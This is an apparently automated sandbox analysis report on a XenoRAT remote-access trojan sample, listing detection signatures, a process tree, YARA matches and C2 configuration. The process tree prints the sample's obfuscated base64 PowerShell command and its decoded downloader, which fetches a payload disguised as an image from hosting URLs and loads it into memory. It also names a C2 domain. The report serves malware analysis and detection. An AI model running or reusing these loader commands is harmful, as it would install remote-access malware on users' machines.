
Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
Analysis ID:1611341
MD5:6159b2025a32b10d721f03c7141577d8
SHA1:829beb712c7ad268f05865bc982d9db519079433
SHA256:8db64fb78d54b15b0648d454b3678b0200431114cb1058d70f4783278b7feb70
Tags:exeuser-SecuriteInfoCom

Detection

XenoRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected XenoRAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe" MD5: 6159B2025A32B10D721F03C7141577D8)
    • cmd.exe (PID: 5164 cmdline: cmd.exe /c 67a7e5e159f71.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 5100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@
u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@
N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@GQ@cgBi@GY@bwBq@FM@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FY@YgBj@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • vbc.exe (PID: 2404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
              • Vbc.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
                • conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 6112 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
{"C2 url": "failed2.myftp.org", "Mutex Name": "Winsock2Mutex", "Install Folder": "appdata"}
Source | Rule | Description | Author | Strings
00000009.00000002.2278176981.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security
Process Memory Space: powershell.exe PID: 1352 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 1352 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
      • 0x2407b:$b2: ::FromBase64String(
      • 0x59ea1:$b2: ::FromBase64String(
      • 0x23e4e:$b3: ::UTF8.GetString(
      • 0x9b132:$s1: -join
      • 0xa462e:$s1: -join
      • 0x4011:$s3: reverse
      • 0xf84f:$s3: reverse
      • 0x26a9b:$s3: reverse
      • 0x2d6f0:$s3: reverse
      • 0x2f6d7:$s3: reverse
      • 0x3a706:$s3: reverse
      • 0x4aeb0:$s3: reverse
      • 0x50c1d:$s3: reverse
      • 0xf34e2:$s3: reverse
      • 0xf37d0:$s3: reverse
      • 0xf3eea:$s3: reverse
      • 0xf46a3:$s3: reverse
      • 0xfb78e:$s3: reverse
      • 0xfbba8:$s3: reverse
      • 0xfc730:$s3: reverse
      • 0xfd3dd:$s3: reverse
Process Memory Space: powershell.exe PID: 5388 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 5388 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
        • 0x41c3:$b2: ::FromBase64String(
        • 0x279f7:$b2: ::FromBase64String(
        • 0x31b4f:$b2: ::FromBase64String(
        • 0x483a9:$b2: ::FromBase64String(
        • 0x4d160:$b2: ::FromBase64String(
        • 0x4e739:$b2: ::FromBase64String(
        • 0x3f96:$b3: ::UTF8.GetString(
        • 0x277ca:$b3: ::UTF8.GetString(
        • 0x31922:$b3: ::UTF8.GetString(
        • 0x4817c:$b3: ::UTF8.GetString(
        • 0x4cf33:$b3: ::UTF8.GetString(
        • 0x4e50c:$b3: ::UTF8.GetString(
        • 0x239e2:$s1: -join
        • 0x5942a:$s1: -join
        • 0x5b7f4:$s1: -join
        • 0x40b8:$s4: +=
        • 0x1e447:$s4: +=
        • 0x1e4e9:$s4: +=
        • 0x21c01:$s4: +=
        • 0x236b7:$s4: +=
        • 0x238cd:$s4: +=
Source | Rule | Description | Author | Strings
9.2.vbc.exe.400000.0.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security

Source | Rule | Description | Author | Strings
amsi64_5388.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

            Spreading

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; 
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Conve

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@G
E@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
